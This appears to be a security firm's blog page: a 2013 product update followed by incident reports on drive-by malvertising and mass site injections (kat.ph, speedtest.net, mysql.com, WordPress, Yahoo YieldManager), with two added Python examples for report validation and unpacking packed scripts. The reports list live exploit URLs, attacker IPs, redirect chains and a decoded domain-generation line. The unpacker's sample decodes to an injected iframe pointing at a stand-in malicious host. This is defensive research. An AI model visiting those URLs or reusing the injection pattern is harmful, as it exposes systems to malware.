Armorize launched new service at RSA 2013: HackAlert Scanning and Forensics Extraction API for Malware, Malvertising, 0-day and APT Attacks


We've just completed our participation at the RSA Conference in San Francisco--our 7th year as an exhibitor! We hope to give an update here of what's been happening at Armorize. It's been 16 months since we've blogged. We've been too busy--there are many new partners and customers to support, many new threats to analyze, and many new technologies to develop--and all of this makes spending time on the blog seem an unjustifiable luxury. We hope to resume blogging in a couple of months, but meanwhile, this blog post will serve as an update of what we've been working on in the past 16 months. In summary, we've been busy with:

  1. Expanding our engineering and operations team, and arranging for their advanced training and certification.
  2. Developing and finalizing the HackAlert V5 API, and working on the HackAlert V6 API, which is to be released in 3Q of this year.
  3. Expanding the HackAlert V5 API to incorporate support for APT (advanced persistent threat) detection and AFRM- (Armorize Forensics and Reporting Methodology) based reporting.
  4. Developing and finalizing CodeSecure V5, and planning for CodeSecure V6.
Regarding (1), R&D expansion:


We've been expanding our engineering team and would like to congratulate the 35 colleagues who have recently passed their EC-Council Certified Ethical Hacker certification: Adam Wei (ECC974360), Ain Chang (ECC974345), Alex Ruan (ECC974342), Allan Ku (ECC971799), Angus Wei (ECC974359), Aryan Chen (ECC974344), Carol Ru (ECC974341), Cyndi Wei (ECC974340), Eddie Chou (ECC974362), Eric Liu (ECC971746), Fred Tai (ECC971717), Hsuan Wang (ECC974346), Hyman Pan (ECC971733), Jasmine Chen (ECC974343), Jason Yang (ECC971702), Jeff Lee (ECC971815), Jimmy Huang (ECC974354), Joe Chang (ECC974361), Jordan Forssman, Lance Chang (ECC971730), In-Yee Lee (ECC971736), Mars Fu (ECC971756), Martin Chen (ECC971707), Matt Huang (ECC974356), Max Hsu (ECC974353), Michelle Juan (ECC974363), Paul Chen (ECC974358), Robin Huang (ECC971724), Roger Wang (ECC971813), Susan Chiu (ECC974347), Tom Kao (ECC971805), Van Cheng (ECC974357), Wayne Huang (ECC971814), and Wilson Chiou (ECC971812).

Continuous technical training is critical for us, and we've found that training coupled with certification makes an effective combination. Our next targets will be CISSP and ECSP.

Regarding (2), the HackAlert V5 API:

The V3 API was first released in 2009 and is now both mature and robust. Based upon our experience operating the V3 service, we developed several generations of the HackAlert API, leveraging various new big data technologies. We released the HackAlert V4 API in 2010, which focused on providing our malvertising scanning platform. This time at RSA 2013, we released the HackAlert V5 API. Developed completely from the ground up around the latest methodologies for scalability, V5 is extremely scalable and fault tolerant, capable of handling a partner as big as Google. It also comes with an entirely new generation of malware and malvertising detection engines, built from scratch starting in late 2011. This provides improved detection accuracy and coverage, as well as very detailed incident traceback reporting that precisely describes an incident's origin, the areas of impact, and the final attack point. The V3 and V4 servers, and consequently their APIs, are approaching the end of their product life cycle. Starting from Nov 1st, 2012, new partners are not offered the option to use either V3 or V4. We are now working with existing partners to help them migrate to HackAlert V5.




Regarding (3), APT and AFRM-based reports:

AFRM-based reporting is an important new feature of the HackAlert V5 API. For every scan you submit to the HackAlert service (e.g., online ad, URL, malware, document exploit), you will get a detailed, aggregated forensics report, laid out according to the Armorize Forensics Reporting Methodology (AFRM). AFRM enables you to easily comprehend the returned forensics data, and to use it for your own further analysis. AFRM reports include:
  1. Scene details (e.g., URL, ad tag, PDF document).
  2. Aggregated interpretations (e.g., "malicious", "blacklisted").
  3. Aggregated proofs (e.g., "drive-by download", "registry modification", "process injection"). Proofs provide support for interpretations.
  4. Aggregated exhibits (e.g., code snippet of shellcode, code snippet of exploit code, code snippet of HTTP responses, parameters of API calls, sections of binary files). Exhibits are sections of evidence that provide support for proofs.
  5. Aggregated evidence (e.g., HTTP response, API calls, binary files).
  6. Evidence correlations (e.g., Javascript 1 (Exhibit A) --> document.write (Exhibit B) --> Javascript 2 (Exhibit C) --> Load iframe 3 (Exhibit D)).
You will know exactly what a target is made up of, what it tries to do, where the attack is coming from, and the causality relationships between the collected evidence.
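The layered structure above, as an added example in Python (this is not Armorize's API or code): a constructed AFRM-style report, the checks a consumer of such a report would want (every interpretation rests on proofs, every proof on exhibits, every exhibit on evidence), and a walk along the correlation edges from the attack's origin to the final attack point. All identifiers and the sample report are constructed for illustration.

```python
# Constructed sample report following the AFRM layers described in the post.
SAMPLE_REPORT = {
    "scene": {"type": "URL", "value": "http://publisher.example/"},
    "evidence": {
        "E1": "HTTP response: publisher page",
        "E2": "HTTP response: ad script",
        "E3": "HTTP response: exploit landing page",
        "E4": "API call trace of the dropped binary",
    },
    # Exhibits are sections of evidence; each names the evidence it was cut from.
    "exhibits": {
        "A": {"evidence": "E1", "snippet": "Javascript 1: <script src=...>"},
        "B": {"evidence": "E2", "snippet": "document.write(...)"},
        "C": {"evidence": "E2", "snippet": "Javascript 2: unescape(...)"},
        "D": {"evidence": "E3", "snippet": "Load iframe 3: <iframe src=...>"},
        "E": {"evidence": "E4", "snippet": "WriteProcessMemory(...)"},
    },
    # Proofs are backed by exhibits; interpretations are backed by proofs.
    "proofs": {"drive-by download": ["A", "B", "C", "D"], "process injection": ["E"]},
    "interpretations": {"malicious": ["drive-by download", "process injection"]},
    # Causality edges between exhibits, from cause to effect.
    "correlations": [("A", "B"), ("B", "C"), ("C", "D"), ("D", "E")],
}


def validate(report):
    """Return a list of problems; empty means each layer is supported by the one below."""
    problems = []
    exhibits, proofs = report["exhibits"], report["proofs"]
    for name, ex in exhibits.items():
        if ex["evidence"] not in report["evidence"]:
            problems.append(f"exhibit {name} cites unknown evidence {ex['evidence']}")
    for proof, backing in proofs.items():
        if not backing:
            problems.append(f"proof '{proof}' has no exhibits")
        for ex in backing:
            if ex not in exhibits:
                problems.append(f"proof '{proof}' cites unknown exhibit {ex}")
    for interp, backing in report["interpretations"].items():
        if not backing:
            problems.append(f"interpretation '{interp}' has no proofs")
        for proof in backing:
            if proof not in proofs:
                problems.append(f"interpretation '{interp}' cites unknown proof {proof}")
    for src, dst in report["correlations"]:
        for node in (src, dst):
            if node not in exhibits:
                problems.append(f"correlation references unknown exhibit {node}")
    return problems


def causality_chain(report):
    """Order the exhibits from the attack's origin to the final attack point.

    Follows the correlation edges; raises ValueError on a cycle or when there is
    not exactly one origin, since then the report does not describe one chain.
    """
    edges = report["correlations"]
    nodes = {n for e in edges for n in e}
    indeg = {n: 0 for n in nodes}
    out = {n: [] for n in nodes}
    for src, dst in edges:
        out[src].append(dst)
        indeg[dst] += 1
    roots = sorted(n for n in nodes if indeg[n] == 0)
    if len(roots) != 1:
        raise ValueError(f"expected one origin, found {roots}")
    order, ready = [], list(roots)
    while ready:  # Kahn's topological order over the causality graph
        node = ready.pop(0)
        order.append(node)
        for nxt in out[node]:
            indeg[nxt] -= 1
            if indeg[nxt] == 0:
                ready.append(nxt)
    if len(order) != len(nodes):
        raise ValueError("correlations contain a cycle")
    return order


def attack_origin(report):
    """The evidence behind the first exhibit in the chain: where the attack came from."""
    first = causality_chain(report)[0]
    return report["evidence"][report["exhibits"][first]["evidence"]]


if __name__ == "__main__":
    print("problems:", validate(SAMPLE_REPORT))
    print("chain:", " --> ".join(causality_chain(SAMPLE_REPORT)))
    print("origin:", attack_origin(SAMPLE_REPORT))
```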

Exploit-Based Malware Infections

To explain AFRM, we first take a look at the exploit-based malware infection (EBMI) process, which is a widely used attack vector in Advanced Persistent Threats (APT). In EBMI, the victim is infected via opening a malicious document, often referred to as a document exploit. Common document exploit formats used in EBMI include Web pages, PDF files, Word files, Powerpoint files, Excel files, and Flash files embedded inside one of the previous types.

Phase 1: Exploit delivery and shellcode execution

During EBMI phase 1, the victim opens a document via a (document) renderer, defined as a software program that displays the document. Common (document, renderer) pairs include: (Web page, Web browser), (Web page containing Flash, Web browser with Flash support or plug-in), (Web page containing Java applets, Web browser with applet support / JRE), (PDF document, PDF reader), (Word document, MS Word), (Excel document, MS Excel), (Powerpoint document, MS Powerpoint), etc.

The document here, being malicious, is referred to as a document exploit. It contains mechanisms to exploit vulnerabilities either directly inside the renderer itself, or inside one of the renderer's installed plug-ins (e.g., Flash, Java applet, RealPlayer, etc.). If the exploited vulnerability is unknown to the renderer provider (vendor), then it is called a 0-day exploit.

This exploitation code (the exploit) is often implemented using scripting languages (e.g., Javascript, Actionscript, VBScript, VBA). Two key factors make scripting languages extremely useful for this purpose: a) they provide the functionality needed to exploit the targeted vulnerability, and b) being interpreted languages, they make it very easy to obfuscate the exploitation code, thus making detection difficult.

Common (renderer, scripting language) pairs include (Web browsers, Javascript), (Flash, Actionscript), (PDF, JScript), (Office documents, VBA macros). Note that Javascript, Actionscript, and JScript are all ECMA-based scripting languages.

The following attacks leverage an EBMI process: a) drive-by download attacks, b) malvertising attacks, c) URL-based email attacks, and d) attachment-based email attacks. In (a) (b) and (c), the browser ultimately loads a Web page served by an exploit pack, which serves polymorphic Web-page exploits. The server that hosts the exploit pack is called the exploit server, and the involved URLs are called the exploit URLs.

Phase 2: Malware execution

When a document exploit is opened and upon successful exploitation, a dropper is often created on disk and executed. The dropper can either be the actual malware, or it can be just a tiny executable whose sole job is to download the actual malware over the Internet.

In order to permanently infect the compromised system, the malware will often a) move itself to permanent disk locations and b) modify system configuration (e.g., registry settings) so as to be executed automatically upon every system startup. In order to hide itself from security checkers and users, the malware will often a) rename itself to seemingly legitimate filenames or b) arrange for alternative, less detectable and higher-privileged methods of execution, for example, using process injection.

Once permanently installed, the malware will typically start to a) connect back home to the command-and-control (CNC) server, or to b) send the collected information back to the attacker.

Using the HackAlert V5 API, you will not only be able to detect EBMI, but also receive detailed forensics reports on exactly what happened during the two EBMI phases.

Regarding (4), CodeSecure V5:

CodeSecure V5 offers better performance, accuracy, and language support than CodeSecure V4. Last year, I managed to convince six of my university classmates and roommates to quit their excellent jobs and join Armorize. Among them, Martin Chen now oversees CodeSecure's development. He's written an entirely separate blog post and we'll be putting it up very soon.


Malvertising on KickAssTorrents (kat.ph), OpenX compromised to serve fake anti-virus "Security Sphere 2012"

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Yesterday our HackAlert website malware monitoring service told us that KickAssTorrents (kat.ph), ranked 321 globally on Alexa with more than 1.5 million unique visitors per month, is serving malware to all of its visitors via malvertising. Below is a video showing how visitors are infected:


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? This error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something in your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================

KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the thread it appears that Avast acknowledged that it was indeed a false positive and addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.

[Summary]

Here we summarize characteristics worth noting:

1. High traffic website compromised.
2. Malvertising via compromising KickAssTorrents' OpenX platform.
3. Spreading fake antivirus "Security Sphere 2012" by conducting a drive-by download process. Simply navigating to the website with an outdated browsing platform will result in infection. No clicks necessary (see video).
4. Same attackers responsible for the recent speedtest.net incident.
5. Using DynDNS domains for their exploit server.
6. Domain names are auto-calculated using Javascript. The algorithm used generates a (predictable) different dyndns.tv domain name every hour, in the format of roboABCD.tv, where ABCD are characters derived from a fixed seed and incremented by one character every different UTC hour.
7. The new dyndns domain for the next hour is generated every hour precisely at minutes 2 to 5, so this may be done by an automated mechanism.
8. Initial antivirus detection rates are very low, from 0 to 2 vendors out of 43 on VirusTotal.
9. All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.
10. The domain obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through a Russian registrar, 1'ST DOMAIN NAME SERVICE www.1dns.ru. At this time the domain resolved to a Netherlands IP, 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

[Details]

KickAssTorrents serves its ads via its OpenX installation at ad.kat.ph. This platform has been compromised and made to serve browser exploits. In our video, this URL:

http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/&section=1939940

was injected with malicious javascript. In the following code snippet, the highlighted sections are the injected part. Note the code isn't just a few lines of "injection"--the code is merged with the original OpenX html code:


The following are the important parts of the decoded version:

From lines 29-41, we can see that the function spelled() generates four characters based on the current hour in UTC. From line 18 we can see how this function is called: var gyrally = spelled(String("robo"), new String(".dynd" + "ns.tvmg7j".substr(0, 5)));

Antivirus detection of the dropped and installed malicious binary was 2 out of 42 vendors on VirusTotal.

And finally, here's a screenshot of the installed fake antivirus Security Sphere 2012:


http://jjghui.com/urchin.js mass infection ongoing

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Starting Oct 9th, we've been tracing a mass injection attempt. Currently, there have been 180,000 affected pages, according to Google.


The attack targets visitors of six particular languages--English, German, French, Italian, Polish, and Breton, as seen in the following deobfuscated script:



Here is a text version of the above decoded script.

The script causes the visiting browser to load an iframe, first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser.

In a drive-by download attack, visitors who navigate to the infected websites will have malware installed on their machines without their knowledge, provided they have outdated browsing platforms (browser, Adobe PDF, Adobe Flash, Java, etc.).

This wave of mass injection is targeting ASP and ASP.NET websites.

Currently, 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.


jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.

[Details]

1. ASP and ASP.NET websites are injected with the following script (text is here):


2. The contents of urchin.js are as seen below; full text is here.


3. The above script decodes to the following:

Here is a text version of the above decoded script.

4. The above script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.


Malvertising lifecycle case study 1--OpenX compromise on speedtest.net, spreading Security Sphere 2012 fake antivirus

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Incident: SpeedTest.net, ranked 541 on Alexa with 8,141,777 unique visitors and 10,177,221 page views per month, fell victim to malvertising and was spreading the "Security Sphere 2012" fake antivirus to its visitors. By simply navigating to the website, visitors with outdated browsing environments (browser or browser plugins such as Java, Adobe Flash, Adobe PDF Reader, etc) will end up with Security Sphere permanently installed inside their systems.

Malware: By claiming that every application "has been infected by malware and cannot be executed," Security Sphere 2012 basically locks down the infected computer until the victim purchases a "license" for it to "clean up the infections."

Cause: SpeedTest.net runs its own online advertisement platform using OpenX, using the domain ads.ookla.com. The attackers compromised this OpenX platform and injected a malicious iframe into every ad served. We have a video of how visitors are infected:


Malware Lifecycle: Initially, the detection rate on VirusTotal was 0 out of 43:

The malware detects common VMs (virtual machines) and will not execute inside a VM or sandbox. This helps it avoid detection.

Below is a timeline of the malware lifecycle. We missed some submission intervals, so the timeline isn't 100% accurate, but it gives a good idea:

2011-09-XX 00:00 UTC Initial injection into SpeedTest.net and other websites
|
|
(Antivirus companies do not have this particular malware sample and therefore no one is detecting it)
|
(We don't know how long this period was)
|
|
2011-09-30 09:23 UTC 0 / 43, we first submitted the sample to VirusTotal. Because all 43 participating antivirus vendors are in partnership with VirusTotal, they should all have this sample once we've submitted it.

2011-09-30 11:00 UTC 2 / 43, Kaspersky, NOD32

2011-09-30 15:00 UTC 3 / 43, Dr. Web

2011-09-30 19:00 UTC 7 / 43, Comodo, Emsissoft, Microsoft, Panda

2011-09-30 23:00 UTC 9 / 43, AVG, Symantec

2011-10-01 03:00 UTC 14 / 43, BitDefender, F-Secure, GData, PCTools, SUPERAntiSpyware

2011-10-01 07:00 UTC 14 / 43,

2011-10-01 11:00 UTC 17 / 43, Avast, McAfee, VIPRE

2011-10-01 15:00 UTC 17 / 43,

2011-10-01 19:00 UTC 22 / 43, Ahn-Lab-V3, Ikarus, K7AntiVirus, McAfee-GW-Edition, Sophos

2011-10-01 23:00 UTC 22 / 43,

2011-10-02 03:00 UTC 22 / 43,

2011-10-02 07:00 UTC 22 / 43,

2011-10-02 11:00 UTC 22 / 43,

2011-10-02 15:00 UTC 22 / 43,

2011-10-02 19:00 UTC 22 / 43,

2011-10-02 23:00 UTC 22 / 43,

2011-10-03 03:00 UTC 22 / 43,

2011-10-03 07:00 UTC 22 / 43,

2011-10-03 11:00 UTC 30 / 43, AntiVir, Antiy-AVL, CAT-QuickHeal, Emsisoft, TheHacker, TrendMicro, TrendMicro-HouseCall, VirusBuster

2011-10-03 15:00 UTC 30 / 43,

2011-10-03 19:00 UTC 31 / 43, nProtect

2011-10-03 23:00 UTC 31 / 43,

2011-10-04 03:00 UTC 31 / 43,

2011-10-04 07:00 UTC 31 / 43,

2011-10-04 11:00 UTC 31 / 43,

2011-10-04 15:00 UTC 31 / 43,

2011-10-04 19:00 UTC 31 / 43,

2011-10-04 23:00 UTC 31 / 43,

2011-10-05 03:00 UTC 31 / 43,

2011-10-05 07:00 UTC 31 / 43,

2011-10-05 11:00 UTC 32 / 43, eTrust-Vet

2011-10-05 15:00 UTC 32 / 43,

2011-10-05 19:00 UTC 32 / 43,

2011-10-05 23:00 UTC 32 / 43,

2011-10-06 03:00 UTC 32 / 43,

2011-10-06 07:00 UTC 32 / 43,

2011-10-06 11:00 UTC 33 / 43, Fortinet

2011-10-06 15:00 UTC 33 / 43,

2011-10-06 19:00 UTC 33 / 43,

2011-10-06 23:00 UTC 33 / 43,

2011-10-07 03:00 UTC 33 / 43,

2011-10-07 07:00 UTC 33 / 43,

2011-10-07 11:00 UTC 33 / 43,

2011-10-07 15:00 UTC 33 / 43,

2011-10-07 19:00 UTC 33 / 43,

2011-10-07 23:00 UTC 33 / 43,

2011-10-08 03:00 UTC 33 / 43,

2011-10-08 07:00 UTC 33 / 43,

2011-10-08 11:00 UTC 33 / 43,

2011-10-08 15:00 UTC 33 / 43,

2011-10-08 19:00 UTC 33 / 43,

2011-10-08 23:00 UTC 33 / 43,

2011-10-09 03:00 UTC 33 / 43,

2011-10-09 07:00 UTC 33 / 43,

2011-10-09 11:00 UTC 33 / 43,

2011-10-09 15:00 UTC 33 / 43,

2011-10-09 19:00 UTC 34 / 43, Jiangmin

2011-10-09 23:00 UTC 34 / 43,

Still not detecting: ByteHero, ClamAV, Commtouch, eSafe, F-Prot, Prevx, Rising, VBA32, ViRobot


Mass WordPress infection ongoing--most malicious domains using changeip.com

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(
To peer researchers: As we all know, researching security incidents takes a lot of time and sacrifice; as if they know exactly how to make our lives harder, attackers often launch right before the weekend or a long vacation. In such an event, we often need to sacrifice our personal plans to be with our families, in order to research and publish threats fast enough.

In the past, usually right after we publish our blog and tweet the link, some other security blogs will very quickly put out a post regarding the same incident. Usually there will be a link to our original post, and we appreciate this very much.

However, recently, for some of our posts, we feel our contents were plainly copied and there was no credit linking to us. We sincerely hope this won't happen.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!
)

We've been tracking an ongoing mass WordPress infection that began to take place around Oct 5th, as detected by our HackAlert Website monitoring service. Many WordPress sites have been hit. Using technologyadvances.net as an example, we've created a video showing how an affected WordPress site can infect its visitors.


[Summary]
1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords, b) backdoors into previously compromised WordPress websites, and c) automated script-injection tools that work in combination with either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware samples will be installed (dropped) onto the visitors' machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:


7. Malicious domains: This time, instead of owning the malicious domains themselves, the attackers are mostly using the dynamic DNS service provided by changeip.com. A sample list is as follows:


8. Malicious IPs: Although all of the above domains were resolving through changeip.com, only a few IPs have been used so far, including the following:

1. 95.163.66.209 (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. 64.131.75.19 (AS25847, United States New York Smv)
3. 182.18.185.82 (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* BlackHole, still analyzing

10. Is your WordPress infected? A very simple way is to check for the existence of the following text: a) showthread b) 72241732 c) 72291731 and if these exist, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.

[Details]

The injection has a simple chain:

1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with changeip.com
3. Browser loads the exploit pack from the malicious domain, hosted on a few fixed IPs including 95.163.66.209 (Russia), 64.131.75.19 (USA), and 182.18.185.82 (India).

Below is an example of an injected script:

Depending on the browsing platform used, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal:
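An added example in Python (not code from this post or from Armorize): an unpacker for Dean Edwards' packer output, followed by the check from item 10 of the summary (look for "showthread", "72241732", "72291731") and extraction of the iframe target from the decoded script, run over a constructed index page. The packed script, the hostname malicious-host.example and the page are constructed for illustration, not captured from an infected site.

```python
import re

# Signature of Dean Edwards' packer output (the packer used in this campaign).
PACKER_RE = re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")

# Argument list at the tail of a packed script: }('payload',radix,count,'w1|w2'.split('|')
ARGS_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)

# Strings the post suggests checking for on a possibly infected WordPress index page.
INDICATORS = ("showthread", "72241732", "72291731")

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"

# Constructed packed script (hostname and content are placeholders, not a capture).
PACKED = (
    r'''eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))'''
    r'''+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c])'''
    r'''{p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}'''
    r'''('0.2(\'<3 4="5://6-7.8/9.a?b=c" d="1" e="1"></3>\');',62,15,'document|'''
    r'''|write|iframe|src|http|malicious|host|example|showthread|php|t|72241732|'''
    r'''width|height'.split('|'),0,{}))'''
)

# Constructed index page with the packed script injected.
SAMPLE_PAGE = "<html><body><h1>Blog</h1>\n<script>" + PACKED + "</script>\n</body></html>"


def encode_index(c, radix):
    """Same mapping as the packer's inner e() function: word index -> token."""
    prefix = "" if c < radix else encode_index(c // radix, radix)
    r = c % radix
    return prefix + (chr(r + 29) if r > 35 else BASE36[r])


def js_unescape(s):
    """Undo the backslash escaping inside the packer's single-quoted arguments."""
    specials = {"n": "\n", "r": "\r", "t": "\t"}
    return re.sub(r"\\(.)", lambda m: specials.get(m.group(1), m.group(1)), s)


def unpack(text):
    """Return the unpacked source of every packed script found in text."""
    if not PACKER_RE.search(text):
        return []
    results = []
    for m in ARGS_RE.finditer(text):
        payload, radix, count = js_unescape(m.group(1)), int(m.group(2)), int(m.group(3))
        words = js_unescape(m.group(4)).split("|")
        # Walk indexes from high to low, as the packer's own loop does. An empty
        # dictionary entry means the word already equals its token, so it stays.
        for c in range(min(count, len(words)) - 1, -1, -1):
            word = words[c]
            if word:
                token = r"\b" + re.escape(encode_index(c, radix)) + r"\b"
                payload = re.sub(token, lambda _m, w=word: w, payload)
        results.append(payload)
    return results


def scan_page(page_html):
    """Report packer use, decoded payloads, indicator strings and iframe targets."""
    decoded = unpack(page_html)
    haystack = "\n".join([page_html] + decoded)
    return {
        "packer": bool(PACKER_RE.search(page_html)),
        "decoded": decoded,
        "indicators": sorted(i for i in INDICATORS if i in haystack),
        "iframes": re.findall(r'<iframe[^>]*\bsrc="([^"]+)"', haystack, re.I),
    }


if __name__ == "__main__":
    for key, value in scan_page(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```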



mysql.com hacked, infecting visitors with malware

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked and is currently serving malware. The highlighted section of the above screenshot is the injected script. Below is a video showing how visitors are infected when navigating to the site:


[Infection Chain]

Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011

This is the injection point. The entire content of the above .js file can be found here.

The injected section is shown in the above screenshot. The decoded version is as follows:
The text version is available here. This script generates an iframe to Step 3.

Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Throws out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser and browser plugins such as Adobe Flash, Adobe PDF, Java, etc.), and upon successful exploitation, permanently installs a piece of malware on the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Currently, 4 out of 44 vendors on VirusTotal can detect this piece of malware.


[The Attacker]

We don't know much at this point. The following is information regarding the associated malicious domains.

falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin

truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm

The mysql.com website is as of now, still serving this exploit and malware.

We're in the process of contacting mysql.com. If anyone has contacts there, please drop us an email at wayne@armorize.com

PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1


Malvertising on Yahoo YieldManager, spreading ransomware acting as Federal German Police (BKA)--Help solve the puzzle!

Help us solve the puzzle!
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Over the past few days, our HackAlert scanning farm has constantly detected malvertising on Yahoo YieldManager (RightMedia). Since YieldManager is one of the world's largest ad networks, websites worldwide, big and small, have all been hit. Fortunately, the exploit server is only serving the malware to German visitors.

In the video below, we demonstrate how Ziddu was infected to serve this German ransomware to its visitors. According to CheckSiteTraffic.com, Ziddu enjoys 1,492,133 page views and 364,825 unique visitors per day.

The malware pretends to be crime-detection software from the Federal German Police. It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc., have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.
(Above: ziddu.com hit by malvertising on Yahoo YieldManager (RightMedia))

(Above: Even Japanese sites were hit)

(Above: The installed ransomware, acting as Federal German Police (BKA))


Below is our video report:


Table of contents
[Summary]
[Attack Trace]
[Malvertising Analysis--The Puzzle]
[The malware]

[Summary]

Incident type: Malvertising
Incident subtype: Drive-by download, ransomware
Responsible ad network: Yahoo YieldManager (RightMedia)
Affected websites: Websites worldwide, large and small, including very large sites such as ziddu.com. Ziddu, for example, has 1,492,133 page views and 364,825 unique visitors per day.
Affected visitors: German visitors only
Fake advertiser: kineticgames.info
Exploit server: BlackHole exploit pack running on town.incredibleoutcomes.com
Malicious domains:
kineticgames.info (184.172.216.234, ASN 36351, US Dallas)
sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)
town.incredibleoutcomes.com (195.200.90.129, ASN 35524, Ukraine)
bundespol.net (188.229.97.2, ASN 44872, Romania)

Associated names and emails:
einzahlung@bundespol.net
Vasiliy Pushkin, vasili006@gmail.com
Piotr Pushkin, pppiotr88@gmail.com

[Attack Trace]
Using ziddu.com as an example.

Link 1: (Publisher)
Ziddu's website includes the following ad tag:
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122"></IFRAME>
Link 2: (Ad Network) http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122 is loaded, which contains javascript that generates an iframe to:

Link 3: (Ad Network) http://ad.globe7.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which throws back an HTTP 302 redirect to:

Link 4: (Ad Network) http://ad.yieldmanager.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which contains javascript that generates an iframe to:

